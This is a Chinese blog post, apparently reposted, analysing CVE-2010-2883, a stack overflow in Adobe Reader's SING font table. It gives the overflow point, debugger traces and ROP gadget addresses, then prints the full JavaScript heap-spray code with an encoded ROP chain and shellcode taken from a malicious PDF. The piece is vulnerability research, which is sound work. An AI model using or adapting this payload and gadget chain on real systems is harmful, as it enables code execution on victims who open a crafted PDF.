CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞

最新推荐文章于 2024-08-14 12:00:04 发布
最新推荐文章于 2024-08-14 12:00:04 发布
阅读量347 收藏
点赞数
文章标签: python 数据结构与算法
原文链接:https://my.oschina.net/u/3281747/blog/1789733
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  此漏洞是因strcat()复制SING表而出现的栈溢出漏洞,同时可通过PDF中可运行JS代码的特性来进行堆喷射运行shellcode,达到最终exploitation的目的。

    在分析具体漏洞之前,我建议先看看相关的PDF格式说明,以及TTF字体和相关的SING表,SING表的资料比较难找,只能找到一些图片说明。TTF字体结构是“偏移子表”-“表目录”-“X表”这种形式的,其中表目录的结构是

    SING表数据结构说明:

    了解了相应的基础知识后,我们来具体地查看漏洞代码。直接IDA定位String View到源码,

关键处,大致伪码是这样的:

此处,*(_DWORD*)sing_table_ptr获得的是SING表的tableVersionMajor+tableVersionMinor,比较SING表的version之后才进行strcat(),而(const char*)(sing_table_ptr+0x10)则是uniqueName,此处便是将SING表的uniqueName项复制到&v24处,从而导致溢出。详细的触发情况是这样的:

0803DDAB    E8 483D1300               call jmp.MSVCR80.strcat
0803DEAF    E8 2A8DFDFF               call CoolType.08016BDE
    08016C56    E8 C64E0000               call CoolType.0801BB21
        0801BB41    FF10                      call dword ptr ds:[eax]
            0808B308    FF10                      call dword ptr ds:[eax] // 触发点,eax=0x12E6D0,距离uniqueName起始处0x7B0字节

到达触发点时的运行栈布局如图所示:

4A80CB38    add ebp,794                 //ebp=0x0012E4DC(0x0012DD48+0x794)
4A80CB3E    leave                       //esp=0x0012E4E0(mov esp,ebp;pop ebp),ebp=[0x0012E4DC](0x0FEB0EEA)
4A80CB3F    ret                         //eip=[esp]=0x4A82A714       

//首先call dword ptr ds:[eax]运行到0x4A80CB38处,
//将栈向高地址移动,即移动到我们的uniqueName+0x8处
//之后再ret跳到0x4A82A714处
4A82A714       pop esp          //esp=[esp](0x0C0C0C0C)                    
4A82A715       ret              //eip=[0x0C0C0C0C]=0x4A8063A5        

//第二阶段的gadget将堆栈移动到0x0C0C0C0C处,
//使得我们能通过剩下的gadget配合堆上的参数调用目标函数

剩下的部分就是执行堆喷射处的gadget了,我们可以在PDFStreamDumper中查看到PDF文件嵌入的JS代码


var shellcode = unescape( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ue9d9%u6ebf%u2e0e%ud92b%u2474%u5df4%uc933%u31b1%ued83%u31fc%u147d%u7d03%uec7a%ud7db%u726a%u2823%u136a%ucdad%u135b%u86c9%ua3cb%ucb99%u48e7%uffcf%u3c7c%uf0d8%u8b35%u3e3e%ua0c6%u2103%ubb44%u8157%u7475%uc0aa%u69b2%u9047%ue56b%u05fa%ub318%uaec6%u5552%u524f%u5422%uc57e%u0f39%ue7a0%u3bee%uffe9%u06f3%u74a3%ufdc7%u5d32%ufd16%ua099%u0c97%ue5e3%uef1f%u1f96%u925c%udba0%u481f%uf824%u1b87%u249e%ucf36%uae79%ua434%ue80e%u3b58%u82c2%ub064%u44e5%u82ed%u40c1%u51b6%ud06b%u3712%u0294%ue8fd%u4830%ufc13%u1348%u0379%u29de%u03cf%u31e0%u6c7f%ubad1%ueb10%u68ee%u0355%u31a5%u8cff%ua060%ud142%u1e92%uec80%uab10%u0b78%ude08%u577d%u328e%uc80f%u357b%ue9bc%u56a9%u7a23%ub731%ufac6%uc7d0' );
var rop1 = unescape('%u0C0C%u0C0C');
while (rop1.length + 20 + 8 < 65536) 
  rop1 +=rop1;

rop2 = rop1.substring(0, (0x0c0c-0x24)/2);
rop2 += shellcode;
rop2 += rop1;
rop3 = rop2.substring(0, 65536/2);

while(rop3.length < 0x80000) 
  rop3 += rop3;

rop4 = rop3.substring(0, 0x80000 - (0x1020-0x08) / 2);
var final_shellcode = new Array();
for (i=0;i<0x1f0;i++)
  final_shellcode[i]=rop4+"s";

只是一串精准定位堆喷射的代码,具体技术目前我也不是很清楚,之后研究清楚了我会回改的。如果现在你想了解更多,可看这里

第一个栈溢出漏洞分析告一段落,理论上说也可以将剩下的gadget放在栈中,可是0x12E6D0-0x12E4DC之间0x1F4字节的空间不是很大(shellcode.len=0x220),所以索性使用堆喷射来绕过DEP并且加载运行shellcode(真正的功能性shellcode是从0x0C0C0D54处开始的)

转载于:https://my.oschina.net/u/3281747/blog/1789733

weixin_33696822
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING栈溢出漏洞
m0_51246873的博客
01-12 918
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING栈溢出漏洞
ttf文件结构解析
a369488983的博客
01-19 3414
TrueType字体通常包含在单个TrueType字体文件中,其文件后缀为.TTF。OpenType字体是以类似 于TrueType字体的格式编码的POSTSCRIPT字体。OPENTYPE字体使用.OTF文件后缀。OPENTYPE还允许把多个OPENTYPE字体组合在一个文件中以利于数据共享。这些字体被称为TrueType字体集(TrueType collection),其文件...
Adobe Reader栈溢出漏洞(CVE-2010-2883)分析
鬼手的博客
06-08 2483
文章目录漏洞描述测试环境静态分析定位触发点分析漏洞成因动态调试获取SING的入口地址溢出点精心挑选的返回地址JavaScript实现HeapSpray利用ROP链绕过DEP保护漏洞利用流程总结漏洞修复参考资料 这个漏洞是《漏洞战争》里面的第一个漏洞,也是我分析的第一个漏洞。水平有限,如有错误还望各位大佬指正。 漏洞描述 CVE-2010-2883Adobe Reader和Acrobat中的Co...
动手实验 CVE-2010-2883 Adobe Reader TTF字体SING栈溢出漏洞
abelxu
02-08 2635
文章目录1.漏洞环境2.定位漏洞3.动态调试4.分析msf生成脚本4.1make_ttf4.2 make_js5.实现自己的shellcode绕过DEP5.1 利用ZwSetInformationProcess和SetProcessDEPPolicy关闭DEP(win xp sp3不能用)5.2 VirtualProtect绕过DEP5.3VirtualAlloc绕过DEP6.总结 本文包括简单的漏洞分析和比较详细的exp动态调试,以及自己动手写exp绕过DEP的实践 1.漏洞环境 环境 备注
CVE-2010-2883字体文件SING栈溢出
07-03
CVE-2010-2883字体文件SING栈溢出CVE-2010-2883字体文件SING栈溢出
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
字体目录
07-14
CAD字体,直接把下载的cad字体,一般shx格式的字体,直接拷贝到autocad安装目录下的fonts目录下即可,如果是windows的字体,为tif格式,拷贝到系统的windows\fonts下即可
Adobe Reader 缓冲区溢出漏洞CVE-2010-2883漏洞分析报告
君子谬
11-28 2114
一. 简介   软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:
CVE-2010-2883 Adobe Reader TTF字体SING栈溢出漏洞分析
xiaoeryu_的博客
03-18 907
CVE-2010-2883 Adobe Reader TTF字体SING栈溢出漏洞0x1:漏洞描述0x2:分析环境0x3:基于字符串定位的漏洞分析方法0x4:样本Exploit技术分析0x05:动态调试 0x1:漏洞描述 ​ CVE-2010-2883Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING中的uniqueName项时存在的栈溢出漏洞,用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 0x2:分析环境 推荐使用的环境 备注
50天53个漏洞Adobe Reader 模糊测试结果
liqiuman180688的博客
12-21 307
nana 安全牛 安全公司 Check Point 使用流行 Windows 模糊测试框架WinAFL进行了为期50天的实验,在 Adobe Reader 中找出53个新关键漏洞。 该公司透露,2017年报告的新漏洞总数约为1.4万个,远远超出以往年份,是2016年的2倍还多。究其原因,可能是模糊测试器(即自动化漏洞查找工具)功能的完善和流行度的上升。 模糊测试器并非新鲜事物,早在20多年前就已...
css 样式文字溢出显示省略号
热门推荐
难得糊涂
12-16 2万+
<br />原本以为文字溢出的处理比较复杂,没想到这么一简简单单的一句话就搞定了,css真是神奇:<br />.li { white-space:nowrap;overflow:hidden;text-overflow:ellipsis; }<br />现在学习希望搞清楚每个具体的属性的意思,存在脑子里,以后就可以顺手写出来啦!<br />查阅了下,属性如下:<br />white-space:nowrap;示文本不会换行,在同一行继续,知道遇到<br>标签为止;<br />overflow:hidden
Adobe阅读器漏洞(adobe_cooltype_sing)学习研究
weixin_30381793的博客
03-31 319
实验环境:Kali 2.0+Windows XP sp3+Adobe Reader 9.0.0 类别:缓冲区溢出 描述:这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING对象中一个名为uniqueName的参数造成缓冲区溢出。 参考资料:《Metasploit魔鬼训练营》p286-p298 Adobe漏洞渗透过程: kali上使用windows/fileforma...
python学习】深入解析 `jq` 库:JSON 处理的利器
m0_54007171的博客
08-13 381
jq库是 Python 对流行的命令行工具jq的封装。它允许你直接在 Python 中使用jq的查询语言来处理 JSON 数据。借助jq,你可以轻松地对 JSON 数据进行过滤、选择、转换、聚合等操作,极大地简化了代码复杂度。
GraphRAG:复杂查询的知识图谱新框架
最新发布
YeJuliaLi的博客
08-14 616
微软最近发布了名为 GraphRAG(Graphs + Retrieval Augmented Generation)的创新 RAG 框架,这是一个将文本提取、语义网络分析,与大语言模型(LLM)的提示和总结功能结合在一起的端到端系统,用于深入理解文本数据集。在对私有数据中的复杂文本信息进行文档分析时,GrahRAG 使用 LLM 生成的知识图谱来大幅提高问答性能。这里的私有数据集是指 LLM 没...
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值